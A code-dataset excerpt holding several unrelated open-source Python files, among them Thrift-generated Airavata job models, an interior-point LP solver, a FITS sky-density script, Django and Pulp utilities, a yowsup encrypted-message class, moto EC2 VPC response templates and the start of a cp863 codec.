LIGHTCYAN_EX = 106
LIGHTWHITE_EX = 107
class AnsiStyle(AnsiCodes):
BRIGHT = 1
DIM = 2
NORMAL = 22
RESET_ALL = 0
Fore = AnsiFore()
Back = AnsiBack()
Style = AnsiStyle()
Cursor = AnsiCursor()
| mit |
jjj117/airavata | airavata-api/airavata-client-sdks/airavata-python-sdk/src/main/resources/lib/apache/airavata/model/job/ttypes.py | 2 | 8174 | #
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import apache.airavata.model.status.ttypes
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class JobModel:
"""
Attributes:
- jobId
- taskId
- processId
- jobDescription
- creationTime
- jobStatus
- computeResourceConsumed
- jobName
- workingDir
- stdOut
- stdErr
- exitCode
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'jobId', None, None, ), # 1
(2, TType.STRING, 'taskId', None, None, ), # 2
(3, TType.STRING, 'processId', None, None, ), # 3
(4, TType.STRING, 'jobDescription', None, None, ), # 4
(5, TType.I64, 'creationTime', None, None, ), # 5
(6, TType.STRUCT, 'jobStatus', (apache.airavata.model.status.ttypes.JobStatus, apache.airavata.model.status.ttypes.JobStatus.thrift_spec), None, ), # 6
(7, TType.STRING, 'computeResourceConsumed', None, None, ), # 7
(8, TType.STRING, 'jobName', None, None, ), # 8
(9, TType.STRING, 'workingDir', None, None, ), # 9
(10, TType.STRING, 'stdOut', None, None, ), # 10
(11, TType.STRING, 'stdErr', None, None, ), # 11
(12, TType.I32, 'exitCode', None, None, ), # 12
)
def __init__(self, jobId=None, taskId=None, processId=None, jobDescription=None, creationTime=None, jobStatus=None, computeResourceConsumed=None, jobName=None, workingDir=None, stdOut=None, stdErr=None, exitCode=None,):
self.jobId = jobId
self.taskId = taskId
self.processId = processId
self.jobDescription = jobDescription
self.creationTime = creationTime
self.jobStatus = jobStatus
self.computeResourceConsumed = computeResourceConsumed
self.jobName = jobName
self.workingDir = workingDir
self.stdOut = stdOut
self.stdErr = stdErr
self.exitCode = exitCode
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.jobId = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.taskId = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.processId = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.jobDescription = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.creationTime = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.jobStatus = apache.airavata.model.status.ttypes.JobStatus()
self.jobStatus.read(iprot)
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.computeResourceConsumed = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.STRING:
self.jobName = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.STRING:
self.workingDir = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.STRING:
self.stdOut = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.STRING:
self.stdErr = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.I32:
self.exitCode = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('JobModel')
if self.jobId is not None:
oprot.writeFieldBegin('jobId', TType.STRING, 1)
oprot.writeString(self.jobId)
oprot.writeFieldEnd()
if self.taskId is not None:
oprot.writeFieldBegin('taskId', TType.STRING, 2)
oprot.writeString(self.taskId)
oprot.writeFieldEnd()
if self.processId is not None:
oprot.writeFieldBegin('processId', TType.STRING, 3)
oprot.writeString(self.processId)
oprot.writeFieldEnd()
if self.jobDescription is not None:
oprot.writeFieldBegin('jobDescription', TType.STRING, 4)
oprot.writeString(self.jobDescription)
oprot.writeFieldEnd()
if self.creationTime is not None:
oprot.writeFieldBegin('creationTime', TType.I64, 5)
oprot.writeI64(self.creationTime)
oprot.writeFieldEnd()
if self.jobStatus is not None:
oprot.writeFieldBegin('jobStatus', TType.STRUCT, 6)
self.jobStatus.write(oprot)
oprot.writeFieldEnd()
if self.computeResourceConsumed is not None:
oprot.writeFieldBegin('computeResourceConsumed', TType.STRING, 7)
oprot.writeString(self.computeResourceConsumed)
oprot.writeFieldEnd()
if self.jobName is not None:
oprot.writeFieldBegin('jobName', TType.STRING, 8)
oprot.writeString(self.jobName)
oprot.writeFieldEnd()
if self.workingDir is not None:
oprot.writeFieldBegin('workingDir', TType.STRING, 9)
oprot.writeString(self.workingDir)
oprot.writeFieldEnd()
if self.stdOut is not None:
oprot.writeFieldBegin('stdOut', TType.STRING, 10)
oprot.writeString(self.stdOut)
oprot.writeFieldEnd()
if self.stdErr is not None:
oprot.writeFieldBegin('stdErr', TType.STRING, 11)
oprot.writeString(self.stdErr)
oprot.writeFieldEnd()
if self.exitCode is not None:
oprot.writeFieldBegin('exitCode', TType.I32, 12)
oprot.writeI32(self.exitCode)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.jobId is None:
raise TProtocol.TProtocolException(message='Required field jobId is unset!')
if self.taskId is None:
raise TProtocol.TProtocolException(message='Required field taskId is unset!')
if self.processId is None:
raise TProtocol.TProtocolException(message='Required field processId is unset!')
if self.jobDescription is None:
raise TProtocol.TProtocolException(message='Required field jobDescription is unset!')
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.jobId)
value = (value * 31) ^ hash(self.taskId)
value = (value * 31) ^ hash(self.processId)
value = (value * 31) ^ hash(self.jobDescription)
value = (value * 31) ^ hash(self.creationTime)
value = (value * 31) ^ hash(self.jobStatus)
value = (value * 31) ^ hash(self.computeResourceConsumed)
value = (value * 31) ^ hash(self.jobName)
value = (value * 31) ^ hash(self.workingDir)
value = (value * 31) ^ hash(self.stdOut)
value = (value * 31) ^ hash(self.stdErr)
value = (value * 31) ^ hash(self.exitCode)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| apache-2.0 |
burakbayramli/dersblog | func_analysis/func_60_primdual/pdl.py | 2 | 2494 | import numpy as np
from scipy.optimize import linprog
from numpy.linalg import matrix_rank
def solve(c, A, b, epsilon=0.0001):
if matrix_rank(A) < min(A.shape[0], A.shape[1]):
print('A is not full rank, dropping redundant rows')
_, pivots = sympy.Matrix(A).T.rref()
A = A[list(pivots)]
print('Shape of A after dropping redundant rows is {}'.format(A.shape))
m = A.shape[0]
n = A.shape[1]
x = np.ones(shape=(n, ))
l = np.ones(shape=(m, ))
s = np.ones(shape=(n, ))
k = 0
while abs(np.dot(x, s)) > epsilon:
k += 1
primal_obj = np.dot(c, x)
dual_obj = np.dot(b, l)
print('iteration #{}; primal_obj = {:.5f}, dual_obj = {:.5f}; duality_gap = {:.5f}'.format
(k, primal_obj, dual_obj, primal_obj - dual_obj))
sigma_k = 0.4
mu_k = np.dot(x, s) / n
A_ = np.zeros(shape=(m + n + n, n + m + n))
A_[0:m, 0:n] = np.copy(A)
A_[m:m + n, n:n + m] = np.copy(A.T)
A_[m:m + n, n + m:n + m + n] = np.eye(n)
A_[m + n:m + n + n, 0:n] = np.copy(np.diag(s))
A_[m + n:m + n + n, n + m:n + m + n] = np.copy(np.diag(x))
b_ = np.zeros(shape=(n + m + n, ))
b_[0:m] = np.copy(b - np.dot(A, x))
b_[m:m + n] = np.copy(c - np.dot(A.T, l) - s)
tmp = np.dot(np.dot(np.diag(x), np.diag(s)), np.ones(shape=(n, )))
b_[m + n:m + n + n] = np.copy( sigma_k * mu_k * np.ones(shape=(n, )) - tmp )
delta = np.linalg.solve(A_, b_)
delta_x = delta[0:n]
delta_l = delta[n:n + m]
delta_s = delta[n + m:n + m + n]
alpha_max = 1.0
for i in range(n):
if delta_x[i] < 0:
alpha_max = min(alpha_max, -x[i]/delta_x[i])
if delta_s[i] < 0:
alpha_max = min(alpha_max, -s[i]/delta_s[i])
eta_k = 0.99
alpha_k = min(1.0, eta_k * alpha_max)
x = x + alpha_k * delta_x
l = l + alpha_k * delta_l
s = s + alpha_k * delta_s
diff = np.dot(A, x) - b
print('Ax - b = {}; ideally it should have been zero vector'.format(diff))
print('norm of Ax - b is = {}; ideally it should have been zero'.format
(np.linalg.norm(diff)))
return x
A = np.array([[1, 1, 1, 0],
[1, 3, 0, 1]])
b = np.array([5,7])
c = np.array([-1, -5, 0, 0 ])
res = solve(c,A,b)
print (res)
res = linprog(c, A_eq=A, b_eq=b, options={"disp": True})
print (res)
| gpl-3.0 |
Kivvix/stage-LPC | trackSrc/density.py | 1 | 4448 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
## @package density
# @author J. Massot
# @date 2014-04-30
#
# @brief Calculate density of pictures into strip 82
#
# @details Search all coordinates of each `fits` file and count density
from numpy import *
import math
# to manipulate fits files
import pyfits
import csv
import glob
## @def RA_BEG RA_END
# @brief begin and end of field in RA
RA_BEG = 5.0
RA_END = 7.5
DEC_BEG = -1.2
DEC_END = 1.2
## @def RA_N DEC_N
# @brief number of division in RA and Dec
RA_N = 1000
DEC_N = 100
## @def RA_A RA_B
# @brief coeficient of equation y = RA_A*x + RA_B to convert coordinates into indices on matrix (x coordinate, y indice)
RA_A = (RA_N)/(RA_END - RA_BEG)
RA_B = -1.0*RA_A*RA_BEG
DEC_A = (DEC_N)/(DEC_END - DEC_BEG)
DEC_B = -1.0*DEC_A*DEC_BEG
## @def fname
# @brief name of output file
fname = "density.csv"
## @fn foncfg
# @brief global function of f(u,v) et g(u,v)
#
# @param L lettre of matrix name (A ou B)
# @param img object containing all data on the image of the current calexp
# @param u variables intermediate calculation `SKY1_CRVAL1` and `SKY2_CRVAL2`
# @param v same as u
#
# @return r value of $f(u,v)$ or $g(u,v)$ according to the value of L
def foncfg(L,img,u,v):
r = 0
for p in range( 0 , img[L+"_ORDER"] ):
for q in range( 0 , img[L+"_ORDER"]-p ):
try:
# security to confirm L_p_q
a = img[L+"_"+str(p)+"_"+str(q)]
except:
a = 0.0
r += a * (u**p) * (v**q)
return r
## @fn f
# @brief see function `#foncfg` for more information
#
# @return f(u,v)
def f(img,u,v):
return foncfg('A',img,u,v)
## fn g
# @ see function `#foncfg` for more information
# @return g(u,v)
def g(img,u,v):
return foncfg('B',img,u,v)
## @fn X
# @brief Compute vector with `SKY1_CRVAL1` et `SKY2_CRVAL2` value
#
# @param img object containing all data on the image of the current calexp
# @param u variables intermediate calculation `SKY1_CRVAL1` and `SKY2_CRVAL2`
# @param v same as u
#
# @return X matrix (one column) with coordonate of `SKY1_CRVAL1` and `SKY2_CRVAL2`
def X(img,u,v,CD):
fuv = f(img,u,v)
guv = g(img,u,v)
Y = matrix(str(u+fuv) + " ; " + str(v+guv))
X = CD*Y
X = X + matrix( str(img["CRVAL1"]) + " ; " + str(img["CRVAL2"]) )
return X
## @fn CD
# @brief matrix to calculate `SKY1_CRVAL1` and `SKY2_CRVAL2`
#
# @param img object containing all data on the image of the current `calexp`
#
# @return CD matrix to calculate `SKY1_CRVAL1` and `SKY2_CRVAL2`
def CD(img):
return matrix( str(img["CD1_1"]) + " " + str(img["CD1_2"]) + " ; " + \
str(img["CD2_1"]) + " " + str(img["CD2_2"]) )
## @fn coord
# @brief compute extreme coordinates of current `calexp`
#
# @param fits name of fits file
#
# @return coordMin,coordMax list of matrix with extreme coordinates
def coord(fits):
# open fits file
hdulist = pyfits.open(fits)
## @def img
# @brief img object containing all data on the image of the current calexp
img = hdulist[1].header
CDmat = CD(img)
hdulist.close()
# compute SKY1_CRVAL1 and SKY2_CRVAL2 in pixel (0,0)
coordMin = X(img,img["CRPIX1"],img["CRPIX2"],CDmat)
return coordMin
def addZone(fits):
global RA_A , RA_B
global DEC_A , DEC_B
global RA_N , DEC_N
global mat
coordMin = coord(fits)
numFits = fits.split('/')[-1][7:21]
#print " ( " + str(coordMin[0]) + " ; " + str(coordMin[1]) + " )"
for i in range( int(math.floor(RA_A * coordMin[0] + RA_B)) , int(math.floor(RA_A * (coordMin[0]+0.2) + RA_B)) ):
if i > 0 and i < RA_N:
for j in range( int(DEC_A * coordMin[1] + DEC_B) , int(DEC_A * (coordMin[1]+0.2) + DEC_B) ):
if j > 0 and j < DEC_N:
try:
mat[(i,j)][1].append(numFits)
mat[(i,j)] = ( mat[(i,j)][0]+1 , mat[(i,j)][1] )
except:
mat[(i,j)] = ( 1 , [fits.split('/')[-1][7:21],] )
mat = {}
listFits = glob.glob("/sps/lsst/data/dev/lsstprod/DC_2013_one_percent/calexp_dir/sci-results/*/*/u/calexp/calexp-*.fits")
#listFits = glob.glob("/home/massot/Projet/compareSrc/data/calexp/calexp-*.fits")
nFits = len(listFits)
n = 1
print "début de la récupération des données : "
for fits in listFits:
print "\r"+str(n) + " / " + str(nFits),
n += 1
# for each calexp fits file
addZone(fits)
print "\nfin de la récupération des données"
f = open(fname, "wb")
writer = csv.writer(f)
writer.writerow( ('i', 'j', 'density' , 'rrrrrr-cv-ffff') )
for i,j in mat:
writer.writerow( (i,j,mat[i,j][0],mat[i,j][1]) )
| mit |
grengojbo/satchmo | satchmo/apps/satchmo_utils/unique_id.py | 12 | 3376 | """
Create a unique user id given a first and last name.
First, we try simple concatenation of first and last name.
If that doesn't work, we add random numbers to the name
"""
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from htmlentitydefs import name2codepoint
from satchmo_utils import random_string
import re
import unicodedata
_is_alnum_re = re.compile(r'\w+')
_ID_MIN_LENGTH = 5 # minimum reasonable length for username
_ID_MAX_LENGTH = 30 # as defined in django.auth.contrib.models.User.username field
def _id_generator(first_name, last_name, email):
def _alnum(s, glue=''):
return glue.join(filter(len, _is_alnum_re.findall(s))).lower()
# The way to generate id is by trying:
# 1. username part of email
# 2. ascii-transliterated first+last name
# 3. whole email with non-alphanumerics replaced by underscore
# 4. random string
# Every try must return at least _ID_MIN_LENGTH chars to succeed and is truncated
# to _ID_MAX_LENGTH. All IDs are lowercased.
id = _alnum(email.split('@')[0])
if len(id) >= _ID_MIN_LENGTH:
yield id[:_ID_MAX_LENGTH]
id = _alnum(unicodedata.normalize('NFKD', first_name + last_name).encode('ascii', 'ignore'))
if len(id) >= _ID_MIN_LENGTH:
yield id[:_ID_MAX_LENGTH]
id = _alnum(email, glue='_')
if len(id) >= _ID_MIN_LENGTH:
yield id[:_ID_MAX_LENGTH]
while True:
yield _alnum('%s_%s' % (id[:_ID_MIN_LENGTH], random_string(_ID_MIN_LENGTH, True)))[:_ID_MAX_LENGTH]
def generate_id(first_name='', last_name='', email=''):
valid_id = False
gen = _id_generator(first_name, last_name, email)
test_name = gen.next()
while valid_id is False:
try:
User.objects.get(username=test_name)
except User.DoesNotExist:
valid_id = True
else:
test_name = gen.next()
return test_name
# From http://www.djangosnippets.org/snippets/369/
def slugify(s, entities=True, decimal=True, hexadecimal=True,
instance=None, slug_field='slug', filter_dict=None):
s = smart_unicode(s)
#character entity reference
if entities:
s = re.sub('&(%s);' % '|'.join(name2codepoint), lambda m: unichr(name2codepoint[m.group(1)]), s)
#decimal character reference
if decimal:
try:
s = re.sub('&#(\d+);', lambda m: unichr(int(m.group(1))), s)
except:
pass
#hexadecimal character reference
if hexadecimal:
try:
s = re.sub('&#x([\da-fA-F]+);', lambda m: unichr(int(m.group(1), 16)), s)
except:
pass
#translate
s = unicodedata.normalize('NFKD', s).encode('ascii', 'ignore')
#replace unwanted characters
#Added _ because this is a valid slug option
s = re.sub(r'[^-a-z0-9_]+', '-', s.lower())
#remove redundant -
s = re.sub('-{2,}', '-', s).strip('-')
slug = s
if instance:
def get_query():
query = instance.__class__.objects.filter(**{slug_field: slug})
if filter_dict:
query = query.filter(**filter_dict)
if instance.pk:
query = query.exclude(pk=instance.pk)
return query
counter = 1
while get_query():
slug = "%s-%s" % (s, counter)
counter += 1
return slug
| bsd-3-clause |
Work4Labs/lettuce | tests/integration/lib/Django-1.3/django/utils/itercompat.py | 294 | 1169 | """
Providing iterator functions that are not in all version of Python we support.
Where possible, we try to use the system-native version and only fall back to
these implementations if necessary.
"""
import itertools
# Fallback for Python 2.4, Python 2.5
def product(*args, **kwds):
"""
Taken from http://docs.python.org/library/itertools.html#itertools.product
"""
# product('ABCD', 'xy') --> Ax Ay Bx By Cx Cy Dx Dy
# product(range(2), repeat=3) --> 000 001 010 011 100 101 110 111
pools = map(tuple, args) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
if hasattr(itertools, 'product'):
product = itertools.product
def is_iterable(x):
"A implementation independent way of checking for iterables"
try:
iter(x)
except TypeError:
return False
else:
return True
def all(iterable):
for item in iterable:
if not item:
return False
return True
def any(iterable):
for item in iterable:
if item:
return True
return False
| gpl-3.0 |
jeremycline/pulp | client_lib/pulp/client/commands/consumer/bind.py | 17 | 8165 | from gettext import gettext as _
from pulp.client.commands.options import DESC_ID, OPTION_CONSUMER_ID, OPTION_REPO_ID
from pulp.client.commands.polling import PollingCommand
from pulp.client.consumer_utils import load_consumer_id
from pulp.client.extensions.extensions import PulpCliFlag, PulpCliOption
from pulp.common import tags
OPTION_DISTRIBUTOR_ID = PulpCliOption('--distributor-id', DESC_ID, required=True)
FLAG_FORCE = PulpCliFlag('--force',
_('delete the binding immediately without tracking the progress'))
class BindRelatedPollingCommand(PollingCommand):
"""
Unfortunately, the Pulp server will report bind/unbind tasks as successful even though they
failed. Due to this, we must override the PollingCommand's succeeded() and failed() methods.
This is a superclass for ConsumerBindCommand and ConsumerUnbindCommand so we can solve this
issue in one place.
"""
def succeeded(self, task):
"""
The server will lie to us and tell us that the bind/unbind task is succeeded when it is not.
We must inspect the task's progress report to find out what really happened. If it
succeeded, call the superclass method. If not, call self.failed().
:param task: The task to inspect for success or failure
:type task: pulp.bindings.responses.Task
"""
if task.result['succeeded']:
super(BindRelatedPollingCommand, self).succeeded(task)
else:
self.failed(task)
def failed(self, task):
"""
The server does not put error messages in the standard locations for Pulp Tasks, so we need
a custom failure message renderer. This method prints the error message.
:param task: The task to inspect for success or failure
:type task: pulp.bindings.responses.Task
"""
super(BindRelatedPollingCommand, self).failed(task)
msg = _("Please see the Pulp server logs for details.")
self.context.prompt.render_failure_message(msg, tag='error_message')
class ConsumerBindCommand(BindRelatedPollingCommand):
"""
Base class that binds a consumer to a repository and an arbitrary
distributor.
"""
def __init__(self, context, name=None, description=None):
name = name or 'bind'
description = description or _('binds a consumer to a repository')
PollingCommand.__init__(self, name, description, self.run, context)
self.add_option(OPTION_REPO_ID)
self.add_consumer_option()
self.add_distributor_option()
def add_consumer_option(self):
"""
Override this method to a no-op to skip adding the consumer id option.
This allows commands (such as the consumer command) to find the consumer
id via other means than a command line option.
"""
self.add_option(OPTION_CONSUMER_ID)
def add_distributor_option(self):
"""
Override this method to a no-op to skip adding the distributor options.
This allows derived commands to specialize (read: hard-code) the
distributor types they work with.
"""
self.add_option(OPTION_DISTRIBUTOR_ID)
def run(self, **kwargs):
consumer_id = self.get_consumer_id(kwargs)
repo_id = kwargs[OPTION_REPO_ID.keyword]
distributor_id = self.get_distributor_id(kwargs)
response = self.context.server.bind.bind(consumer_id, repo_id, distributor_id)
tasks = response.response_body # already a list for bind
self.poll(tasks, kwargs)
def get_consumer_id(self, kwargs):
"""
Override this method to provide the consumer id to the run method.
"""
return kwargs.get(OPTION_CONSUMER_ID.keyword, load_consumer_id(self.context))
def get_distributor_id(self, kwargs):
"""
Override this method to provide the distributor id to the run method.
"""
return kwargs[OPTION_DISTRIBUTOR_ID.keyword]
def task_header(self, task):
handlers = {
tags.action_tag(tags.ACTION_BIND): self._render_bind_header,
tags.action_tag(tags.ACTION_AGENT_BIND): self._render_agent_bind_header,
}
# There will be exactly 1 action tag for each task (multiple resource tags)
action_tags = [t for t in task.tags if tags.is_action_tag(t)]
action_tag = action_tags[0]
handler = handlers[action_tag]
handler()
def _render_bind_header(self):
"""
Displays the task header for the bind task.
"""
self.prompt.write(_('-- Updating Pulp Server --'), tag='bind-header')
def _render_agent_bind_header(self):
"""
Displays the task header for the agent's bind task.
"""
self.prompt.write(_('-- Notifying the Consumer --'), tag='agent-bind-header')
class ConsumerUnbindCommand(BindRelatedPollingCommand):
"""
Base class that unbinds a consumer from a repository and an arbitrary
distributor.
"""
def __init__(self, context, name=None, description=None):
name = name or 'unbind'
description = description or _('removes the binding between a consumer and a repository')
PollingCommand.__init__(self, name, description, self.run, context)
self.add_option(OPTION_REPO_ID)
self.add_consumer_option()
self.add_distributor_option()
self.add_flag(FLAG_FORCE)
def add_consumer_option(self):
"""
Override this method to a no-op to skip adding the consumer id option.
This allows commands (such as the consumer command) to find the consumer
id via other means than a command line option.
"""
self.add_option(OPTION_CONSUMER_ID)
def add_distributor_option(self):
"""
Override this method to a no-op to skip adding the distributor options.
This allows derived commands to specialize (read: hard-code) the
distributor types they work with.
"""
self.add_option(OPTION_DISTRIBUTOR_ID)
def run(self, **kwargs):
consumer_id = self.get_consumer_id(kwargs)
repo_id = kwargs[OPTION_REPO_ID.keyword]
distributor_id = self.get_distributor_id(kwargs)
force = kwargs[FLAG_FORCE.keyword]
response = self.context.server.bind.unbind(consumer_id, repo_id, distributor_id, force)
tasks = response.response_body # already a list of tasks from the server
self.poll(tasks, kwargs)
def get_consumer_id(self, kwargs):
"""
Override this method to provide the consumer id to the run method.
"""
return kwargs.get(OPTION_CONSUMER_ID.keyword, load_consumer_id(self.context))
def get_distributor_id(self, kwargs):
"""
Override this method to provide the distributor id to the run method.
"""
return kwargs[OPTION_DISTRIBUTOR_ID.keyword]
def task_header(self, task):
handlers = {
tags.action_tag(tags.ACTION_UNBIND): self._render_unbind_header,
tags.action_tag(tags.ACTION_AGENT_UNBIND): self._render_agent_unbind_header,
tags.action_tag(tags.ACTION_DELETE_BINDING): self._render_delete_binding_header,
}
# There will be exactly 1 action tag for each task (multiple resource tags)
action_tags = [t for t in task.tags if tags.is_action_tag(t)]
action_tag = action_tags[0]
handler = handlers[action_tag]
handler()
def _render_unbind_header(self):
"""
Displays the task header for the unbind task.
"""
self.prompt.write(_('-- Updating Pulp Server --'), tag='unbind-header')
def _render_agent_unbind_header(self):
"""
Displays the task header for the agent's unbind task.
"""
self.prompt.write(_('-- Notifying the Consumer --'), tag='agent-unbind-header')
def _render_delete_binding_header(self):
"""
Displays the task header for the second update to the server's database.
"""
self.prompt.write(_('-- Pulp Server Clean Up --'), tag='delete-header')
| gpl-2.0 |
bassijtsma/chatbot | yowsup/layers/axolotl/protocolentities/message_encrypted.py | 36 | 2412 | from yowsup.layers.protocol_messages.protocolentities import MessageProtocolEntity
from yowsup.structs import ProtocolTreeNode
import sys
class EncryptedMessageProtocolEntity(MessageProtocolEntity):
'''
<message retry="1" from="49xxxxxxxx@s.whatsapp.net" t="1418906418" offline="1" type="text" id="1418906377-1" notify="Tarek Galal">
<enc type="{{type}}" v="{{1 || 2}}">
HEX:33089eb3c90312210510e0196be72fe65913c6a84e75a54f40a3ee290574d6a23f408df990e718da761a210521f1a3f3d5cb87fde19fadf618d3001b64941715efd3e0f36bba48c23b08c82f2242330a21059b0ce2c4720ec79719ba862ee3cda6d6332746d05689af13aabf43ea1c8d747f100018002210d31cd6ebea79e441c4935f72398c772e2ee21447eb675cfa28b99de8d2013000</enc>
</message>
'''
TYPE_PKMSG = "pkmsg"
TYPE_MSG = "msg"
def __init__(self, encType, encVersion, encData, _type, _id = None, _from = None, to = None, notify = None, timestamp = None,
participant = None, offline = None, retry = None ):
super(EncryptedMessageProtocolEntity, self).__init__(_type, _id = _id, _from = _from, to = to, notify = notify,
timestamp = timestamp, participant = participant, offline = offline,
retry = retry)
self.setEncProps(encType, encVersion, encData)
def setEncProps(self, encType, encVersion, encData):
assert encType in "pkmsg", "msg"
self.encType = encType
self.encVersion = int(encVersion)
self.encData = encData
def getEncType(self):
return self.encType
def getEncData(self):
return self.encData
def getVersion(self):
return self.encVersion
def toProtocolTreeNode(self):
node = super(EncryptedMessageProtocolEntity, self).toProtocolTreeNode()
encNode = ProtocolTreeNode("enc", data = self.encData)
encNode["type"] = self.encType
encNode["v"] = str(self.encVersion)
node.addChild(encNode)
return node
@staticmethod
def fromProtocolTreeNode(node):
entity = MessageProtocolEntity.fromProtocolTreeNode(node)
entity.__class__ = EncryptedMessageProtocolEntity
encNode = node.getChild("enc")
entity.setEncProps(encNode["type"], encNode["v"],
encNode.data.encode('latin-1') if sys.version_info >= (3,0) else encNode.data)
return entity | gpl-3.0 |
behanceops/moto | moto/ec2/responses/vpcs.py | 12 | 2821 | from __future__ import unicode_literals
from moto.core.responses import BaseResponse
from moto.ec2.utils import filters_from_querystring, vpc_ids_from_querystring
class VPCs(BaseResponse):
def create_vpc(self):
cidr_block = self.querystring.get('CidrBlock')[0]
vpc = self.ec2_backend.create_vpc(cidr_block)
template = self.response_template(CREATE_VPC_RESPONSE)
return template.render(vpc=vpc)
def delete_vpc(self):
vpc_id = self.querystring.get('VpcId')[0]
vpc = self.ec2_backend.delete_vpc(vpc_id)
template = self.response_template(DELETE_VPC_RESPONSE)
return template.render(vpc=vpc)
def describe_vpcs(self):
vpc_ids = vpc_ids_from_querystring(self.querystring)
filters = filters_from_querystring(self.querystring)
vpcs = self.ec2_backend.get_all_vpcs(vpc_ids=vpc_ids, filters=filters)
template = self.response_template(DESCRIBE_VPCS_RESPONSE)
return template.render(vpcs=vpcs)
CREATE_VPC_RESPONSE = """
<CreateVpcResponse xmlns="http://ec2.amazonaws.com/doc/2012-12-01/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpc>
<vpcId>{{ vpc.id }}</vpcId>
<state>pending</state>
<cidrBlock>{{ vpc.cidr_block }}</cidrBlock>
<dhcpOptionsId>dopt-1a2b3c4d2</dhcpOptionsId>
<instanceTenancy>default</instanceTenancy>
<tagSet>
{% for tag in vpc.get_tags() %}
<item>
<resourceId>{{ tag.resource_id }}</resourceId>
<resourceType>{{ tag.resource_type }}</resourceType>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
</vpc>
</CreateVpcResponse>"""
DESCRIBE_VPCS_RESPONSE = """
<DescribeVpcsResponse xmlns="http://ec2.amazonaws.com/doc/2012-12-01/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcSet>
{% for vpc in vpcs %}
<item>
<vpcId>{{ vpc.id }}</vpcId>
<state>{{ vpc.state }}</state>
<cidrBlock>{{ vpc.cidr_block }}</cidrBlock>
<dhcpOptionsId>dopt-7a8b9c2d</dhcpOptionsId>
<instanceTenancy>default</instanceTenancy>
<tagSet>
{% for tag in vpc.get_tags() %}
<item>
<resourceId>{{ tag.resource_id }}</resourceId>
<resourceType>{{ tag.resource_type }}</resourceType>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
</item>
{% endfor %}
</vpcSet>
</DescribeVpcsResponse>"""
DELETE_VPC_RESPONSE = """
<DeleteVpcResponse xmlns="http://ec2.amazonaws.com/doc/2012-12-01/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</DeleteVpcResponse>
"""
| apache-2.0 |
Godiyos/python-for-android | python3-alpha/python3-src/Lib/encodings/cp863.py | 272 | 34252 | """ Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP863.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp863',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
